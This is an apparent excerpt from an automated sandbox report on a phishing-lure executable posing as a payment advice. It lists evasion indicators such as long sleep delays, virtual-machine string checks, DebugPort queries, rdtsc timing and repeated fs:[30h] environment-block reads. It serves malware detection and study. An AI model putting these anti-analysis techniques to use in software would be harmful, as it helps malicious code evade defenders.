                Source: C:\Windows\SysWOW64\finger.exe TID: 7780Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 7780Thread sleep time: -72000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe TID: 7836Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe TID: 7836Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F5C9E0 FindFirstFileW,FindNextFileW,FindClose,9_2_02F5C9E0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1864777192.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: finger.exe, 00000009.00000002.3551915780.000000000345E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3552632470.000000000169F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
                Source: firefox.exe, 0000000B.00000002.2536082481.0000019E4219C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E096E rdtsc 4_2_016E096E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_00417DC3 LdrLoadDll,4_2_00417DC3
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01774164 mov eax, dword ptr fs:[00000030h]4_2_01774164
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01774164 mov eax, dword ptr fs:[00000030h]4_2_01774164
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01738158 mov eax, dword ptr fs:[00000030h]4_2_01738158
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01734144 mov eax, dword ptr fs:[00000030h]4_2_01734144
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01734144 mov eax, dword ptr fs:[00000030h]4_2_01734144
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01734144 mov ecx, dword ptr fs:[00000030h]4_2_01734144
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01734144 mov eax, dword ptr fs:[00000030h]4_2_01734144
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01734144 mov eax, dword ptr fs:[00000030h]4_2_01734144
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6154 mov eax, dword ptr fs:[00000030h]4_2_016A6154
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A6154 mov eax, dword ptr fs:[00000030h]4_2_016A6154
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169C156 mov eax, dword ptr fs:[00000030h]4_2_0169C156
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016D0124 mov eax, dword ptr fs:[00000030h]4_2_016D0124
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01760115 mov eax, dword ptr fs:[00000030h]4_2_01760115
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174A118 mov ecx, dword ptr fs:[00000030h]4_2_0174A118
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174A118 mov eax, dword ptr fs:[00000030h]4_2_0174A118
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174A118 mov eax, dword ptr fs:[00000030h]4_2_0174A118
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174A118 mov eax, dword ptr fs:[00000030h]4_2_0174A118
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E10E mov eax, dword ptr fs:[00000030h]4_2_0174E10E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E10E mov ecx, dword ptr fs:[00000030h]4_2_0174E10E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E10E mov eax, dword ptr fs:[00000030h]4_2_0174E10E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E10E mov eax, dword ptr fs:[00000030h]4_2_0174E10E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E10E mov ecx, dword ptr fs:[00000030h]4_2_0174E10E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E10E mov eax, dword ptr fs:[00000030h]4_2_0174E10E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E10E mov eax, dword ptr fs:[00000030h]4_2_0174E10E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E10E mov ecx, dword ptr fs:[00000030h]4_2_0174E10E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E10E mov eax, dword ptr fs:[00000030h]4_2_0174E10E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E10E mov ecx, dword ptr fs:[00000030h]4_2_0174E10E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017761E5 mov eax, dword ptr fs:[00000030h]4_2_017761E5
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016D01F8 mov eax, dword ptr fs:[00000030h]4_2_016D01F8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0171E1D0 mov eax, dword ptr fs:[00000030h]4_2_0171E1D0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0171E1D0 mov eax, dword ptr fs:[00000030h]4_2_0171E1D0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0171E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0171E1D0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0171E1D0 mov eax, dword ptr fs:[00000030h]4_2_0171E1D0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0171E1D0 mov eax, dword ptr fs:[00000030h]4_2_0171E1D0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017661C3 mov eax, dword ptr fs:[00000030h]4_2_017661C3
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017661C3 mov eax, dword ptr fs:[00000030h]4_2_017661C3
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E0185 mov eax, dword ptr fs:[00000030h]4_2_016E0185
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172019F mov eax, dword ptr fs:[00000030h]4_2_0172019F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172019F mov eax, dword ptr fs:[00000030h]4_2_0172019F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172019F mov eax, dword ptr fs:[00000030h]4_2_0172019F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172019F mov eax, dword ptr fs:[00000030h]4_2_0172019F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01744180 mov eax, dword ptr fs:[00000030h]4_2_01744180
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01744180 mov eax, dword ptr fs:[00000030h]4_2_01744180
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0175C188 mov eax, dword ptr fs:[00000030h]4_2_0175C188
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0175C188 mov eax, dword ptr fs:[00000030h]4_2_0175C188
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169A197 mov eax, dword ptr fs:[00000030h]4_2_0169A197
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169A197 mov eax, dword ptr fs:[00000030h]4_2_0169A197
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169A197 mov eax, dword ptr fs:[00000030h]4_2_0169A197
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016CC073 mov eax, dword ptr fs:[00000030h]4_2_016CC073
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01726050 mov eax, dword ptr fs:[00000030h]4_2_01726050
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A2050 mov eax, dword ptr fs:[00000030h]4_2_016A2050
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01736030 mov eax, dword ptr fs:[00000030h]4_2_01736030
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169A020 mov eax, dword ptr fs:[00000030h]4_2_0169A020
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169C020 mov eax, dword ptr fs:[00000030h]4_2_0169C020
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01724000 mov ecx, dword ptr fs:[00000030h]4_2_01724000
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01742000 mov eax, dword ptr fs:[00000030h]4_2_01742000
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01742000 mov eax, dword ptr fs:[00000030h]4_2_01742000
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01742000 mov eax, dword ptr fs:[00000030h]4_2_01742000
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01742000 mov eax, dword ptr fs:[00000030h]4_2_01742000
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01742000 mov eax, dword ptr fs:[00000030h]4_2_01742000
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01742000 mov eax, dword ptr fs:[00000030h]4_2_01742000
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01742000 mov eax, dword ptr fs:[00000030h]4_2_01742000
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01742000 mov eax, dword ptr fs:[00000030h]4_2_01742000
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016BE016 mov eax, dword ptr fs:[00000030h]4_2_016BE016
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016BE016 mov eax, dword ptr fs:[00000030h]4_2_016BE016
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016BE016 mov eax, dword ptr fs:[00000030h]4_2_016BE016
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016BE016 mov eax, dword ptr fs:[00000030h]4_2_016BE016
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A80E9 mov eax, dword ptr fs:[00000030h]4_2_016A80E9
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0169A0E3
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017260E0 mov eax, dword ptr fs:[00000030h]4_2_017260E0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169C0F0 mov eax, dword ptr fs:[00000030h]4_2_0169C0F0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E20F0 mov ecx, dword ptr fs:[00000030h]4_2_016E20F0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017220DE mov eax, dword ptr fs:[00000030h]4_2_017220DE
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016980A0 mov eax, dword ptr fs:[00000030h]4_2_016980A0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017660B8 mov eax, dword ptr fs:[00000030h]4_2_017660B8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017660B8 mov ecx, dword ptr fs:[00000030h]4_2_017660B8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017380A8 mov eax, dword ptr fs:[00000030h]4_2_017380A8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A208A mov eax, dword ptr fs:[00000030h]4_2_016A208A
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174437C mov eax, dword ptr fs:[00000030h]4_2_0174437C
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0176A352 mov eax, dword ptr fs:[00000030h]4_2_0176A352
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01748350 mov ecx, dword ptr fs:[00000030h]4_2_01748350
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172035C mov eax, dword ptr fs:[00000030h]4_2_0172035C
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172035C mov eax, dword ptr fs:[00000030h]4_2_0172035C
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172035C mov eax, dword ptr fs:[00000030h]4_2_0172035C
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172035C mov ecx, dword ptr fs:[00000030h]4_2_0172035C
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172035C mov eax, dword ptr fs:[00000030h]4_2_0172035C
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0172035C mov eax, dword ptr fs:[00000030h]4_2_0172035C
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0177634F mov eax, dword ptr fs:[00000030h]4_2_0177634F
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01722349 mov eax, dword ptr fs:[00000030h]4_2_01722349
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01778324 mov eax, dword ptr fs:[00000030h]4_2_01778324
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01778324 mov ecx, dword ptr fs:[00000030h]4_2_01778324
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01778324 mov eax, dword ptr fs:[00000030h]4_2_01778324
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_01778324 mov eax, dword ptr fs:[00000030h]4_2_01778324
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DA30B mov eax, dword ptr fs:[00000030h]4_2_016DA30B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DA30B mov eax, dword ptr fs:[00000030h]4_2_016DA30B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016DA30B mov eax, dword ptr fs:[00000030h]4_2_016DA30B
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169C310 mov ecx, dword ptr fs:[00000030h]4_2_0169C310
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016C0310 mov ecx, dword ptr fs:[00000030h]4_2_016C0310
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B03E9 mov eax, dword ptr fs:[00000030h]4_2_016B03E9
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B03E9 mov eax, dword ptr fs:[00000030h]4_2_016B03E9
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B03E9 mov eax, dword ptr fs:[00000030h]4_2_016B03E9
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B03E9 mov eax, dword ptr fs:[00000030h]4_2_016B03E9
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B03E9 mov eax, dword ptr fs:[00000030h]4_2_016B03E9
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B03E9 mov eax, dword ptr fs:[00000030h]4_2_016B03E9
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B03E9 mov eax, dword ptr fs:[00000030h]4_2_016B03E9
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016B03E9 mov eax, dword ptr fs:[00000030h]4_2_016B03E9
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016D63FF mov eax, dword ptr fs:[00000030h]4_2_016D63FF
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016BE3F0 mov eax, dword ptr fs:[00000030h]4_2_016BE3F0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016BE3F0 mov eax, dword ptr fs:[00000030h]4_2_016BE3F0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016BE3F0 mov eax, dword ptr fs:[00000030h]4_2_016BE3F0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017443D4 mov eax, dword ptr fs:[00000030h]4_2_017443D4
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017443D4 mov eax, dword ptr fs:[00000030h]4_2_017443D4
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AA3C0 mov eax, dword ptr fs:[00000030h]4_2_016AA3C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AA3C0 mov eax, dword ptr fs:[00000030h]4_2_016AA3C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AA3C0 mov eax, dword ptr fs:[00000030h]4_2_016AA3C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AA3C0 mov eax, dword ptr fs:[00000030h]4_2_016AA3C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AA3C0 mov eax, dword ptr fs:[00000030h]4_2_016AA3C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016AA3C0 mov eax, dword ptr fs:[00000030h]4_2_016AA3C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A83C0 mov eax, dword ptr fs:[00000030h]4_2_016A83C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A83C0 mov eax, dword ptr fs:[00000030h]4_2_016A83C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A83C0 mov eax, dword ptr fs:[00000030h]4_2_016A83C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016A83C0 mov eax, dword ptr fs:[00000030h]4_2_016A83C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E3DB mov eax, dword ptr fs:[00000030h]4_2_0174E3DB
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E3DB mov eax, dword ptr fs:[00000030h]4_2_0174E3DB
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E3DB mov ecx, dword ptr fs:[00000030h]4_2_0174E3DB
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0174E3DB mov eax, dword ptr fs:[00000030h]4_2_0174E3DB
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_017263C0 mov eax, dword ptr fs:[00000030h]4_2_017263C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0175C3CD mov eax, dword ptr fs:[00000030h]4_2_0175C3CD
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169E388 mov eax, dword ptr fs:[00000030h]4_2_0169E388
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0169E388 mov eax, dword ptr fs:[00000030h]4_2_0169E388
